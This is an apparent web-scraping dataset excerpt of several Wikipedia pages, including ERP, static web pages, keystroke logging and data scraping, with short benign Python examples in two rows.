237 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:File_Upload_Wizard | Thank you for offering to contribute an image or other media file for use on Wikipedia. This wizard will guide you through a questionnaire prompting you for the appropriate copyright and sourcing information for each file. Please ensure you understand copyright and the image use policy before proceeding. Uploads to Wikimedia Commons Upload a non-free file Uploads locally to the English Wikipedia; must comply with the non-free content criteria You do not have JavaScript enabled Sorry, in order to use this uploading script, JavaScript must be enabled. You can still use the plain Special:Upload page to upload files to the English Wikipedia without JavaScript. You are not currently logged in. Sorry, in order to use this uploading script and to upload files, you need to be logged in with your named account. Please log in and then try again. Your account has not become confirmed yet. Sorry, in order to upload files on the English Wikipedia, you need to have a confirmed account. Normally, your account will become confirmed automatically once you have made 10 edits and four days have passed since you created it. You may already be able to upload files on the Wikimedia Commons, but you can't do it on the English Wikipedia just yet. If the file you want to upload has a free license, please go to Commons and upload it there. Important note: if you don't want to wait until you are autoconfirmed, you may ask somebody else to upload a file for you at Wikipedia:Files for upload. In very rare cases an administrator may make your account confirmed manually through a request at Wikipedia:Requests for permissions Confirmed. Sorry, a few special characters and character combinations cannot be used in the filename for technical reasons. This goes especially for : and . Your filename has been modified to avoid these. Please check if it is okay now. The filename you chose seems to be very short, or overly generic. Please don't use: A file of this name already exists on Commons If you upload your file with this name, you will be masking the existing file and make it inaccessible. Your new file will be displayed everywhere the existing file was previously used. This should not be done, except in very rare exceptional cases. Please don't upload your file under this name, unless you seriously know what you are doing. Choose a different name for your new file instead. A file of this name already exists. If you upload your file with this name, you will be overwriting the existing file. Your new file will be displayed everywhere the existing file was previously used. Please don't do this, unless you have a good reason to: It is very important that you read through the following options and questions, and provide all required information truthfully and carefully. Thank you for offering to upload a free work. Wikipedia loves free files. However, we would love it even more if you uploaded them on our sister project, the Wikimedia Commons. Files uploaded on Commons can be used immediately here on Wikipedia as well as on all its sister projects. Uploading files on Commons works just the same as here. Your Wikipedia account will automatically work on Commons too. Please consider uploading your file on Commons. However, if you prefer to do it here instead, you may go ahead with this form. You can also first use this form to collect the information about your file and then send it to Commons from here. 
Please note that by "entirely self-made" we really mean just that. Do not use this section for any of the following: Editors who falsely declare such items as their "own work" will be blocked from editing. Use this only if there is an explicit licensing statement in the source. The website must explicitly say that the image is released under a license that allows free re-use for any purpose, e.g. the Creative Commons Attribution license. You must be able to point exactly to where it says this. If the source website doesn't say so explicitly, please do not upload the file. Public Domain means that nobody owns any copyrights on this work. It does not mean simply that it is freely viewable somewhere on the web or that it has been widely used by others. This is not for images you simply found somewhere on the web. Most images on the web are under copyright and belong to somebody, even if you believe the owner won't care about that copyright. If it is in the public domain, you must be able to point to an actual law that makes it so. If you can't point to such a law but merely found this image somewhere, then please do not upload it. Please remember that you will need to demonstrate that: This file will be used in the following article: Enter the name of exactly one Wikipedia article, without the ... brackets and without the "http: en.wikipedia.org ... URL code. It has to be an actual article, not a talkpage, template, user page, etc. If you plan to use the file in more than one article, please name only one of them here. Then, after uploading, open the image description page for editing and add your separate explanations for each additional article manually. Example article okay. This article doesn't exist The article Example could not be found. Please check the spelling, and make sure you enter the name of an existing article in which you will include this file. If this is an article you are only planning to write, please write it first and upload the file afterwards. This is not an actual encyclopedia article The page Example is not in the main article namespace. Non-free files can only be used in mainspace article pages, not on a user page, talk page, template, etc. Please upload this file only if it is going to be used in an actual article. If this page is an article draft in your user space, we're sorry, but we must ask you to wait until the page is ready and has been moved into mainspace, and only upload the file after that. This is a disambiguation page The page Example is not a real article, but a disambiguation page pointing to a number of other pages. Please check and enter the exact title of the actual target article you meant. If neither of these two statements applies, then please do not upload this image. This section is not for images used merely to illustrate an article about a person or thing, showing what that person or thing look like. In view of this, please explain how the use of this file will be minimal. Well, we're very sorry, but if you're not sure about this file's copyright status, or if it doesn't fit into any of the groups above, then: Please don't upload it. Really, please don't. Even if you think it would make for a great addition to an article. We really take these copyright rules very seriously on Wikipedia. Note that media is assumed to be fully-copyrighted unless shown otherwise; the burden is on the uploader. In particular, please don't upload: If you are in any doubt, please ask some experienced editors for advice before uploading. 
People will be happy to assist you at Wikipedia:Media copyright questions. Thank you. This is the data that will be submitted to upload: Your file is being uploaded. This might take a minute or two, depending on the size of the file and the speed of your internet connection. Once uploading is completed, you will find your new file at this link: File:Example.jpg Your file has been uploaded successfully and can now be found here: File:Example.jpg Please follow the link and check that the image description page has all the information you meant to include. If you want to change the description, just go to the image page, click the "edit" tab at the top of the page and edit just as you would edit any other page. Do not go through this upload form again, unless you want to replace the actual file with a new version. To insert this file into an article, you may want to use code similar to the following: If you wish to make a link to the file in text, without actually showing the image, for instance when discussing the image on a talk page, you can use the following (mark the : after the initial brackets ): See Wikipedia:Picture tutorial for more detailed help on how to insert and position images in pages. Thank you for using the File Upload Wizard.Please leave your feedback, comments, bug reports or suggestions on the talk page. |
238 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Enterprise_resource_planning | Enterprise resource planning (ERP) is the integrated management of main business processes, often in real time and mediated by software and technology. ERP is usually referred to as a category of business management software—typically a suite of integrated applications—that an organization can use to collect, store, manage and interpret data from many business activities. ERP systems can be local-based or cloud-based. Cloud-based applications have grown in recent years due to the increased efficiencies arising from information being readily available from any location with Internet access. ERP provides an integrated and continuously updated view of the core business processes using common databases maintained by a database management system. ERP systems track business resources—cash, raw materials, production capacity—and the status of business commitments: orders, purchase orders, and payroll. The applications that make up the system share data across various departments (manufacturing, purchasing, sales, accounting, etc.) that provide the data. 1 ERP facilitates information flow between all business functions and manages connections to outside stakeholders. 2 According to Gartner, the global ERP market size is estimated at $35 billion in 2021. 3 4 Though early ERP systems focused on large enterprises, smaller enterprises increasingly use ERP systems. 5 The ERP system integrates varied organizational systems and facilitates error-free transactions and production, thereby enhancing the organization's efficiency. However, developing an ERP system differs from traditional system development. 6 ERP systems run on a variety of computer hardware and network configurations, typically using a database as an information repository. 7 The Gartner Group first used the acronym ERP in the 1990s 8 9 to include the capabilities of material requirements planning (MRP), and the later manufacturing resource planning (MRP II), 10 11 as well as computer-integrated manufacturing. Without replacing these terms, ERP came to represent a larger whole that reflected the evolution of application integration beyond manufacturing. 12 Not all ERP packages are developed from a manufacturing core; ERP vendors variously began assembling their packages with finance-and-accounting, maintenance, and human-resource components. By the mid 1990s ERP systems addressed all core enterprise functions. Governments and non profit organizations also began to use ERP systems. 13 An "ERP system selection methodology" is a formal process for selecting an enterprise resource planning (ERP) system. Existing methodologies include: Kuiper's funnel method, Dobrin's three-dimensional (3D) web-based decision support tool, and the Clarkston Potomac methodology. 14 ERP systems experienced rapid growth in the 1990s. Because of the year 2000 problem many companies took the opportunity to replace their old systems with ERP. 15 ERP systems initially focused on automating back office functions that did not directly affect customers and the public. Front office functions, such as customer relationship management (CRM), dealt directly with customers, or e-business systems such as e-commerce and e-government—or supplier relationship management (SRM) became integrated later, when the internet simplified communicating with external parties. 
16 "ERP II" was coined in 2000 in an article by Gartner Publications entitled ERP Is Dead—Long Live ERP II. 17 18 It describes web based software that provides real time access to ERP systems to employees and partners (such as suppliers and customers). The ERP II role expands traditional ERP resource optimization and transaction processing. Rather than just manage buying, selling, etc.—ERP II leverages information in the resources under its management to help the enterprise collaborate with other enterprises. 19 ERP II is more flexible than the first generation ERP. Rather than confine ERP system capabilities within the organization, it goes beyond the corporate walls to interact with other systems. Enterprise application suite is an alternate name for such systems. ERP II systems are typically used to enable collaborative initiatives such as supply chain management (SCM), customer relationship management (CRM) and business intelligence (BI) among business partner organizations through the use of various electronic business technologies. 20 21 The large proportion of companies are pursuing a strong managerial targets in ERP system instead of acquire a ERP company. 22 Developers now make more effort to integrate mobile devices with the ERP system. ERP vendors are extending ERP to these devices, along with other business applications, so that businesses don't have to rely on third-party applications. 23 As an example, the e-commerce platform Shopify was able to make ERP tools from Microsoft and Oracle available on its app in October 2021. 23 Technical stakes of modern ERP concern integration—hardware, applications, networking, supply chains. ERP now covers more functions and roles—including decision making, stakeholders' relationships, standardization, transparency, globalization, etc. 24 ERP systems typically include the following characteristics: An ERP system covers the following common functional areas. In many ERP systems, these are called and grouped together as ERP modules: Government resource planning (GRP) is the equivalent of an ERP for the public sector and an integrated office automation system for government bodies. 26 The software structure, modularization, core algorithms and main interfaces do not differ from other ERPs, and ERP software suppliers manage to adapt their systems to government agencies. 27 28 29 Both system implementations, in private and public organizations, are adopted to improve productivity and overall business performance in organizations, but comparisons (private vs. public) of implementations shows that the main factors influencing ERP implementation success in the public sector are cultural. 30 31 32 Most ERP systems incorporate best practices. This means the software reflects the vendor's interpretation of the most effective way to perform each business process. Systems vary in how conveniently the customer can modify these practices. 33 Use of best practices eases compliance with requirements such as IFRS, Sarbanes-Oxley, or Basel II. They can also help comply with de facto industry standards, such as electronic funds transfer. This is because the procedure can be readily codified within the ERP software and replicated with confidence across multiple businesses that share that business requirement. 34 35 ERP systems connect to real time data and transaction data in a variety of ways. These systems are typically configured by systems integrators, who bring unique knowledge on process, equipment, and vendor solutions. 
Direct integration ERP systems have connectivity (communications to plant floor equipment) as part of their product offering. This requires that the vendors offer specific support for the plant floor equipment their customers operate. Database integration ERP systems connect to plant floor data sources through staging tables in a database. Plant floor systems deposit the necessary information into the database. The ERP system reads the information in the table. The benefit of staging is that ERP vendors do not need to master the complexities of equipment integration. Connectivity becomes the responsibility of the systems integrator. Enterprise appliance transaction modules (EATM) These devices communicate directly with plant floor equipment and with the ERP system via methods supported by the ERP system. EATM can employ a staging table, web services, or system specific program interfaces (APIs). An EATM offers the benefit of being an off the shelf solution. Custom integration solutions Many system integrators offer custom solutions. These systems tend to have the highest level of initial integration cost, and can have a higher long term maintenance and reliability costs. Long term costs can be minimized through careful system testing and thorough documentation. Custom integrated solutions typically run on workstation or server-class computers. ERP's scope usually implies significant changes to staff work processes and practices. 36 Generally, three types of services are available to help implement such changes: consulting, customization, and support. 36 Implementation time depends on business size, number of modules, customization, the scope of process changes, and the readiness of the customer to take ownership for the project. Modular ERP systems can be implemented in stages. The typical project for a large enterprise takes about 14 months and requires around 150 consultants. 37 Small projects can require months; multinational and other large implementations can take years. 38 39 Customization can substantially increase implementation times. 37 Besides that, information processing influences various business functions e.g. some large corporations like Walmart use a just in time inventory system. This reduces inventory storage and increases delivery efficiency, and requires up-to-date data. Before 2014, Walmart used a system called Inforem developed by IBM to manage replenishment. 40 Implementing ERP typically requires changes in existing business processes. 41 Poor understanding of needed process changes prior to starting implementation is a main reason for project failure. 42 The difficulties could be related to the system, business process, infrastructure, training, or lack of motivation. It is therefore crucial that organizations thoroughly analyze processes before they deploy an ERP software. Analysis can identify opportunities for process modernization. It also enables an assessment of the alignment of current processes with those provided by the ERP system. Research indicates that risk of business process mismatch is decreased by: ERP implementation is considerably more difficult (and politically charged) in decentralized organizations, because they often have different processes, business rules, data semantics, authorization hierarchies, and decision centers. 
45 This may require migrating some business units before others, delaying implementation to work through the necessary changes for each unit, possibly reducing integration (e.g., linking via master data management) or customizing the system to meet specific needs. 46 A potential disadvantage is that adopting "standard" processes can lead to a loss of competitive advantage. While this has happened, losses in one area are often offset by gains in other areas, increasing overall competitive advantage. 47 48 Configuring an ERP system is largely a matter of balancing the way the organization wants the system to work with the way the system is designed to work out of the box. ERP systems typically include many configurable settings that in effect modify system operations. For example, in the ServiceNow platform, business rules can be written requiring the signature of a business owner within 2 weeks of a newly completed risk assessment. The tool can be configured to automatically email notifications to the business owner, and transition the risk assessment to various stages in the process depending on the owner's responses or lack thereof. Two-tier ERP software and hardware lets companies run the equivalent of two ERP systems at once: one at the corporate level and one at the division or subsidiary level. For example, a manufacturing company could use an ERP system to manage across the organization using independent global or regional distribution, production or sales centers, and service providers to support the main company's customers. Each independent center (or subsidiary) may have its own business operations cycles, workflows, and business processes. Given the realities of globalization, enterprises continuously evaluate how to optimize their regional, divisional, and product or manufacturing strategies to support strategic goals and reduce time-to-market while increasing profitability and delivering value. 49 With two-tier ERP, the regional distribution, production, or sales centers and service providers continue operating under their own business model—separate from the main company, using their own ERP systems. Since these smaller companies' processes and workflows are not tied to the main company's processes and workflows, they can respond to local business requirements in multiple locations. 50 Factors that affect enterprises' adoption of two-tier ERP systems include: ERP systems are theoretically based on industry best practices, and their makers intend that organizations deploy them "as is". 53 54 ERP vendors do offer customers configuration options that let organizations incorporate their own business rules, but gaps in features often remain even after configuration is complete. ERP customers have several options to reconcile feature gaps, each with their own pros and cons. Technical solutions include rewriting part of the delivered software, writing a homegrown module to work within the ERP system, or interfacing to an external system. These three options constitute varying degrees of system customization—with the first being the most invasive and costly to maintain. 55 Alternatively, there are non-technical options such as changing business practices or organizational policies to better match the delivered ERP feature set. Key differences between customization and configuration include: Advantages of customization include: Customization's disadvantages include that it may: ERP systems can be extended with third-party software, often via vendor-supplied interfaces.
59 60 Extensions offer features such as: 60 Data migration is the process of moving, copying, and restructuring data from an existing system to the ERP system. Migration is critical to implementation success and requires significant planning. Unfortunately, since migration is one of the final activities before the production phase, it often receives insufficient attention. The following steps can structure migration planning: 61 Often, data migration is incomplete because some of the data in the existing system is either incompatible or not needed in the new system. As such, the existing system may need to be kept as an archived database to refer back to once the new ERP system is in place. 61 The most fundamental advantage of ERP is that the integration of a myriad of business processes saves time and expense. Management can make decisions faster and with fewer errors. Data becomes visible across the organization. Tasks that benefit from this integration include: 62 ERP systems centralize business data, which: Critical success factors are a limited number of areas in which results, if satisfactory, will ensure the organization's successful competitive performance. The CSF method has helped organizations specify their own critical information needs. Achieving satisfactory results in the key areas of critical success factors can ensure competitive advantage, leading to improved organizational performance and overcoming the challenges faced by organizations. The theoretical foundation of critical success factors was improved upon, verified, and validated by several researchers, which underscored the importance of CSFs and their application to ERP project implementations. 71 The application of critical success factors can prevent organizations from making costly mistakes, and the effective usage of CSFs can ensure project success and reduce failures during project implementations. Some of the important critical success factors related to ERP projects are: know your data, longer and more integrated testing, utilization of the right people, a longer stabilization period (hyper-care), clear communication, early buy-in from business, a Lean Agile program, less customization, and ERP projects that are business-driven and not IT-driven. 71 Research published in 2011, based on a survey of 225 manufacturers, retailers and distributors, found "high" rates of interest and adoption of ERP systems and that very few businesses were "completely untouched" by the concept of an ERP system. 27% of the companies surveyed had a fully operational system, 12% were at that time rolling out a system and 26% had an existing ERP system which they were extending or upgrading. 72 The term "postmodern ERP" was coined by Gartner in 2013, when it first appeared in the paper series "Predicts 2014". 73 According to Gartner's definition of the postmodern ERP strategy, legacy, monolithic and highly customized ERP suites, in which all parts are heavily reliant on each other, should sooner or later be replaced by a mixture of both cloud-based and on-premises applications, which are more loosely coupled and can be easily exchanged if needed. 73 The basic idea is that there should still be a core ERP solution that would cover most important business functions, while other functions will be covered by specialist software solutions that merely extend the core ERP. This concept is similar to the "best-of-breed" approach 74 to software execution, but it shouldn't be confused with it.
While in both cases, applications that make up the whole are relatively loosely connected and quite easily interchangeable, in the case of the latter there is no ERP solution whatsoever. Instead, every business function is covered by a separate software solution. 75 There is, however, no golden rule as to what business functions should be part of the core ERP, and what should be covered by supplementary solutions. According to Gartner, every company must define their own postmodern ERP strategy, based on the company's internal and external needs, operations and processes. 73 For example, a company may define that the core ERP solution should cover those business processes that must stay behind the firewall, and therefore choose to leave their core ERP on-premises. At the same time, another company may decide to host the core ERP solution in the cloud and move only a few ERP modules as supplementary solutions to on-premises. The main benefits that companies will gain from implementing a postmodern ERP strategy are speed and flexibility when reacting to unexpected changes in business processes or on the organizational level. With the majority of applications having a relatively loose connection, it is fairly easy to replace or upgrade them whenever necessary. In addition to that, following the examples above, companies can select and combine cloud-based and on-premises solutions that are most suited for their ERP needs. The downside of postmodern ERP is that it will most likely lead to an increased number of software vendors that companies will have to manage, as well as pose additional integration challenges for central IT. 76 |
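Of the integration patterns listed earlier in this entry, the staging-table approach is the easiest to sketch: a plant-floor system writes rows into a shared table, and the ERP side reads them on a schedule, so neither side needs to know the other's internals. The sketch below uses SQLite purely as a stand-in for whatever database an actual ERP deployment would use; the table and column names are assumptions.

import sqlite3
import pandas as pd

# Minimal sketch of the staging-table pattern, with SQLite standing in
# for the shared database between plant-floor systems and the ERP.
conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE staging_production (
                    machine_id TEXT, quantity INTEGER, recorded_at TEXT)""")

# A plant-floor system would insert rows like these as work is completed.
conn.executemany(
    "INSERT INTO staging_production VALUES (?, ?, ?)",
    [("press-01", 240, "2024-05-01T08:00"), ("press-02", 180, "2024-05-01T08:00")],
)
conn.commit()

# The ERP-side job simply reads the staging table on a schedule;
# it never needs to know how the plant-floor equipment is wired up.
df = pd.read_sql_query("SELECT * FROM staging_production", conn)
print(df)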
239 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Contact_us | Introduction Readers How to report a problem with an article, or find out more information. Article subjects Problems with articles about you, your company, or somebody you represent. Licensing How to copy Wikipedia's information, donate your own, or report unlicensed use of your information. Donors Find out about the process, how to donate, and information about how your money is spent. Press and partnerships If you're a member of the press looking to contact Wikipedia, or have a business proposal for us. Back to main page Thank you for your interest in contacting Wikipedia. Before proceeding, some important disclaimers: The links on the left should direct you to how to contact us or resolve problems. If you cannot find your issue listed there, you can email helpful, experienced volunteers at info-enwikimedia.org. Please refrain from emailing about disagreements with content; they will not be resolved via email. |
240 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Static_web_page | A static web page, sometimes called a flat page or a stationary page, is a web page that is delivered to a web browser exactly as stored, 1 in contrast to dynamic web pages which are generated by a web application. 2 Consequently, a static web page displays the same information for all users, from all contexts, subject to modern capabilities of a web server to negotiate content-type or language of the document where such versions are available and the server is configured to do so. 3 However, a webpage's JavaScript can introduce dynamic functionality which may make the static web page dynamic. Static web pages are often HTML documents, 4 stored as files in the file system and made available by the web server over HTTP (nevertheless, URLs ending with ".html" are not always static). However, loose interpretations of the term could include web pages stored in a database, and could even include pages formatted using a template and served through an application server, as long as the page served is unchanging and presented essentially as stored. The content of static web pages remains stationary irrespective of the number of times it is viewed. Such web pages are suitable for content that rarely needs to be updated, though modern web template systems are changing this. Maintaining large numbers of static pages as files can be impractical without automated tools, such as static site generators. Any personalization or interactivity has to run client-side, which is restricting. 5 Static site generators are applications that compile static websites - typically populating HTML templates in a predefined folder and file structure, with content supplied in a format such as Markdown or AsciiDoc. Examples of static site generators include: |
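The list of generators is truncated in this extract (well-known examples include Jekyll and Hugo), but the core idea of a static site generator is small enough to sketch: read plain-text content files, pour them into an HTML template, and write out files that the web server can deliver exactly as stored. The template, folder names, and .txt input format below are arbitrary choices for illustration.

from pathlib import Path

# A toy static site generator: fill an HTML template with content files.
TEMPLATE = """<!DOCTYPE html>
<html><head><title>{title}</title></head>
<body><h1>{title}</h1>
{body}
</body></html>"""

def build_site(content_dir="content", output_dir="site"):
    """Render every .txt file in content_dir into a static HTML page."""
    out = Path(output_dir)
    out.mkdir(exist_ok=True)
    for source in Path(content_dir).glob("*.txt"):
        title = source.stem.replace("-", " ").title()
        paragraphs = source.read_text(encoding="utf-8").split("\n\n")
        body = "\n".join(f"<p>{p.strip()}</p>" for p in paragraphs if p.strip())
        (out / f"{source.stem}.html").write_text(
            TEMPLATE.format(title=title, body=body), encoding="utf-8")

# build_site()  # writes one .html file per .txt page, served exactly as stored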
241 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Keystroke_logging | Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, 1 2 typically covertly, so that a person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. A keystroke recorder or keylogger can be either software or hardware. While the programs themselves are legal, 3 with many designed to allow employers to oversee the use of their computers, keyloggers are most often used for stealing passwords and other confidential information. 4 5 Keystroke logging can also be utilized to monitor activities of children in schools or at home and by law enforcement officials to investigate malicious usage. 6 Keylogging can also be used to study keystroke dynamics 7 or human-computer interaction. Numerous keylogging methods exist, ranging from hardware and software-based approaches to acoustic cryptanalysis. In the mid-1970s, the Soviet Union developed and deployed a hardware keylogger targeting typewriters. Termed the "selectric bug", it measured the movements of the print head of IBM Selectric typewriters via subtle influences on the regional magnetic field caused by the rotation and movements of the print head. 8 An early keylogger was written by Perry Kivolowitz and posted to the Usenet newsgroups net.unix-wizards and net.sources on November 17, 1983. 9 The posting seems to be a motivating factor in restricting access to /dev/kmem on Unix systems. The user-mode program operated by locating and dumping character lists (clients) as they were assembled in the Unix kernel. In the 1970s, spies installed keystroke loggers in the US Embassy and Consulate buildings in Moscow. 10 11 They installed the bugs in Selectric II and Selectric III electric typewriters. 12 Soviet embassies used manual typewriters, rather than electric typewriters, for classified information—apparently because they are immune to such bugs. 12 As of 2013, Russian special services still use typewriters. 11 13 14 A software-based keylogger is a computer program designed to record any input from the keyboard. 15 Keyloggers are used in IT organizations to troubleshoot technical problems with computers and business networks. Families and businesspeople use keyloggers legally to monitor network usage without their users' direct knowledge. Microsoft publicly stated that Windows 10 has a built-in keylogger in its final version "to improve typing and writing services". 16 However, malicious individuals can use keyloggers on public computers to steal passwords or credit card information. Most keyloggers are not stopped by HTTPS encryption because that only protects data in transit between computers; software-based keyloggers run on the affected user's computer, reading keyboard inputs directly as the user types. From a technical perspective, there are several categories: Since 2006, keystroke logging has been an established research method for the study of writing processes. 21 22 Different programs have been developed to collect online process data of writing activities, 23 including Inputlog, Scriptlog, Translog and GGXLog. Keystroke logging is used legitimately as a suitable research instrument in several writing contexts. These include studies on cognitive writing processes. Keystroke logging can be used to research writing, specifically.
It can also be integrated into educational domains for second language learning, programming skills, and typing skills. Software keyloggers may be augmented with features that capture user information without relying on keyboard key presses as the sole input. Some of these features include: Hardware-based keyloggers do not depend upon any software being installed as they exist at a hardware level in a computer system. Writing simple software applications for keylogging can be trivial, and like any nefarious computer program, can be distributed as a trojan horse or as part of a virus. What is not trivial for an attacker, however, is installing a covert keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker. Researchers Adam Young and Moti Yung discussed several methods of sending keystroke logging. They presented a deniable password snatching attack in which the keystroke logging trojan is installed using a virus or worm. An attacker who is caught with the virus or worm can claim to be a victim. The cryptotrojan asymmetrically encrypts the pilfered login password pairs using the public key of the trojan author and covertly broadcasts the resulting ciphertext. They mentioned that the ciphertext can be steganographically encoded and posted to a public bulletin board such as Usenet. 44 45 In 2000, the FBI used FlashCrest iSpy to obtain the PGP passphrase of Nicodemo Scarfo, Jr., son of mob boss Nicodemo Scarfo. 46 Also in 2000, the FBI lured two suspected Russian cybercriminals to the US in an elaborate ruse, and captured their usernames and passwords with a keylogger that was covertly installed on a machine that they used to access their computers in Russia. The FBI then used these credentials to gain access to the suspects' computers in Russia to obtain evidence to prosecute them. 47 The effectiveness of countermeasures varies because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. In the case of Windows 10 keylogging by Microsoft, changing certain privacy settings may disable it. 48 An on-screen keyboard will be effective against hardware keyloggers; transparency clarification needed will defeat some—but not all—screen loggers. An anti-spyware application that can only disable hook-based keyloggers will be ineffective against kernel-based keyloggers. Keylogger program authors may be able to update their program's code to adapt to countermeasures that have proven effective against it. An anti-keylogger is a piece of software specifically designed to detect keyloggers on a computer, typically comparing all files in the computer against a database of keyloggers, looking for similarities which might indicate the presence of a hidden keylogger. As anti-keyloggers have been designed specifically to detect keyloggers, they have the potential to be more effective than conventional antivirus software; some antivirus software do not consider keyloggers to be malware, as under some circumstances a keylogger can be considered a legitimate piece of software. 
49 Rebooting the computer using a Live CD or write-protected Live USB is a possible countermeasure against software keyloggers if the CD is clean of malware and the operating system contained on it is secured and fully patched so that it cannot be infected as soon as it is started. Booting a different operating system does not impact the use of a hardware or BIOS based keylogger. Many anti-spyware applications can detect some software based keyloggers and quarantine, disable, or remove them. However, because many keylogging programs are legitimate pieces of software under some circumstances, anti-spyware often neglects to label keylogging programs as spyware or a virus. These applications can detect software-based keyloggers based on patterns in executable code, heuristics and keylogger behaviors (such as the use of hooks and certain APIs). No software-based anti-spyware application can be 100% effective against all keyloggers. 50 Software-based anti-spyware cannot defeat non-software keyloggers (for example, hardware keyloggers attached to keyboards will always receive keystrokes before any software-based anti-spyware application). The particular technique that the anti-spyware application uses will influence its potential effectiveness against software keyloggers. As a general rule, anti-spyware applications with higher privileges will defeat keyloggers with lower privileges. For example, a hook-based anti-spyware application cannot defeat a kernel-based keylogger (as the keylogger will receive the keystroke messages before the anti-spyware application), but it could potentially defeat hook- and API-based keyloggers. Network monitors (also known as reverse-firewalls) can be used to alert the user whenever an application attempts to make a network connection. This gives the user the chance to prevent the keylogger from "phoning home" with their typed information. Automatic form-filling programs may prevent keylogging by removing the requirement for a user to type personal details and passwords using the keyboard. Form fillers are primarily designed for Web browsers to fill in checkout pages and log users into their accounts. Once the user's account and credit card information has been entered into the program, it will be automatically entered into forms without ever using the keyboard or clipboard, thereby reducing the possibility that private data is being recorded. However, someone with physical access to the machine may still be able to install software that can intercept this information elsewhere in the operating system or while in transit on the network. (Transport Layer Security (TLS) reduces the risk that data in transit may be intercepted by network sniffers and proxy tools.) Using one-time passwords may prevent unauthorized access to an account which has had its login details exposed to an attacker via a keylogger, as each password is invalidated as soon as it is used. This solution may be useful for someone using a public computer. However, an attacker who has remote control over such a computer can simply wait for the victim to enter their credentials before performing unauthorized transactions on their behalf while their session is active. Another common way to protect access codes from being stolen by keystroke loggers is by asking users to provide a few randomly selected characters from their authentication code. For example, they might be asked to enter the 2nd, 5th, and 8th characters. 
Even if someone is watching the user or using a keystroke logger, they would only get a few characters from the code without knowing their positions. 51 Use of smart cards or other security tokens may improve security against replay attacks in the face of a successful keylogging attack, as accessing protected information would require both the (hardware) security token as well as the appropriate password passphrase. Knowing the keystrokes, mouse actions, display, clipboard, etc. used on one computer will not subsequently help an attacker gain access to the protected resource. Some security tokens work as a type of hardware-assisted one-time password system, and others implement a cryptographic challenge response authentication, which can improve security in a manner conceptually similar to one time passwords. Smartcard readers and their associated keypads for PIN entry may be vulnerable to keystroke logging through a so-called supply chain attack 52 where an attacker substitutes the card reader PIN entry hardware for one which records the user's PIN. Most on-screen keyboards (such as the on-screen keyboard that comes with Windows XP) send normal keyboard event messages to the external target program to type text. Software key loggers can log these typed characters sent from one program to another. 53 Keystroke interference software is also available. 54 These programs attempt to trick keyloggers by introducing random keystrokes, although this simply results in the keylogger recording more information than it needs to. An attacker has the task of extracting the keystrokes of interest—the security of this mechanism, specifically how well it stands up to cryptanalysis, is unclear. Similar to on-screen keyboards, speech-to-text conversion software can also be used against keyloggers, since there are no typing or mouse movements involved. The weakest point of using voice-recognition software may be how the software sends the recognized text to target software after the user's speech has been processed. Many PDAs and lately tablet PCs can already convert pen (also called stylus) movements on their touchscreens to computer understandable text successfully. Mouse gestures use this principle by using mouse movements instead of a stylus. Mouse gesture programs convert these strokes to user-definable actions, such as typing text. Similarly, graphics tablets and light pens can be used to input these gestures, however, these are becoming less common. timeframe? The same potential weakness of speech recognition applies to this technique as well. With the help of many programs, a seemingly meaningless text can be expanded to a meaningful text and most of the time context-sensitively, e.g. "en.wikipedia.org" can be expanded when a web browser window has the focus. The biggest weakness of this technique is that these programs send their keystrokes directly to the target program. However, this can be overcome by using the 'alternating' technique described below, i.e. sending mouse clicks to non-responsive areas of the target program, sending meaningless keys, sending another mouse click to the target area (e.g. password field) and switching back-and-forth. Alternating between typing the login credentials and typing characters somewhere else in the focus window 55 can cause a keylogger to record more information than it needs to, but this could be easily filtered out by an attacker. 
Similarly, a user can move their cursor using the mouse while typing, causing the logged keystrokes to be in the wrong order e.g., by typing a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter. Lastly, someone can also use context menus to remove, cut, copy, and paste parts of the typed text without using the keyboard. An attacker who can capture only parts of a password will have a larger key space to attack if they choose to execute a brute-force attack. Another very similar technique uses the fact that any selected text portion is replaced by the next key typed. e.g., if the password is "secret", one could type "s", then some dummy keys "asdf". These dummy characters could then be selected with the mouse, and the next character from the password "e" typed, which replaces the dummy characters "asdf". These techniques assume incorrectly that keystroke logging software cannot directly monitor the clipboard, the selected text in a form, or take a screenshot every time a keystroke or mouse click occurs. They may, however, be effective against some hardware keyloggers. Media related to Keystroke logging at Wikimedia Commons |
242 | https://en.wikipedia.org/wiki/Data_scraping | https://pt.wikipedia.org/wiki/Raspagem_de_dados | Data scraping (in Portuguese, raspagem de dados) is a computational technique in which a program extracts data from output that is readable only by humans, produced by a service or application. The extracted data are usually mined and structured in a standard format such as CSV, XML, or JSON. 1 Normally, data transfer is done using data structures suited to automated processing by computers, not by humans. Such formats and protocols are rigidly structured, documented, and easily parsed, keeping ambiguity to a minimum. 1 Data scraping is most often performed on legacy web services or applications, or on those that do not offer an application programming interface. In the latter case, those responsible for the service or application usually regard data scraping as undesirable, possibly because of system overload, loss of advertising revenue, or loss of control over the information content. 1 Data extraction is often considered ad hoc, an inelegant technique, frequently used as a last resort when no other data-interchange mechanism is available. Web pages are built using text-based markup languages (HTML and XHTML) and frequently contain a wealth of useful textual data. However, most web pages are designed for human end users, not for automated use. Because of this, tools that scrape web content were created. A web scraper is an API for extracting data from a web site. Companies such as Amazon AWS and Google provide scraping tools, services, and public data available at no cost to end users. 1 Newer forms of web scraping involve capturing data feeds from web servers. For example, JSON is commonly used as a transport and storage mechanism between the client and the web server. Recently, companies have developed web systems that rely on techniques from Document Object Model parsing, computer vision, and natural language processing to simulate the human processing that occurs when viewing a web page, in order to extract useful information automatically. Screen scraping is a scraping technique generally associated with the programmatic collection of visual data from a source, as opposed to the extraction of textual data as in web scraping. Originally, screen scraping referred to the process of obtaining textual data from a computer screen or an image file. |
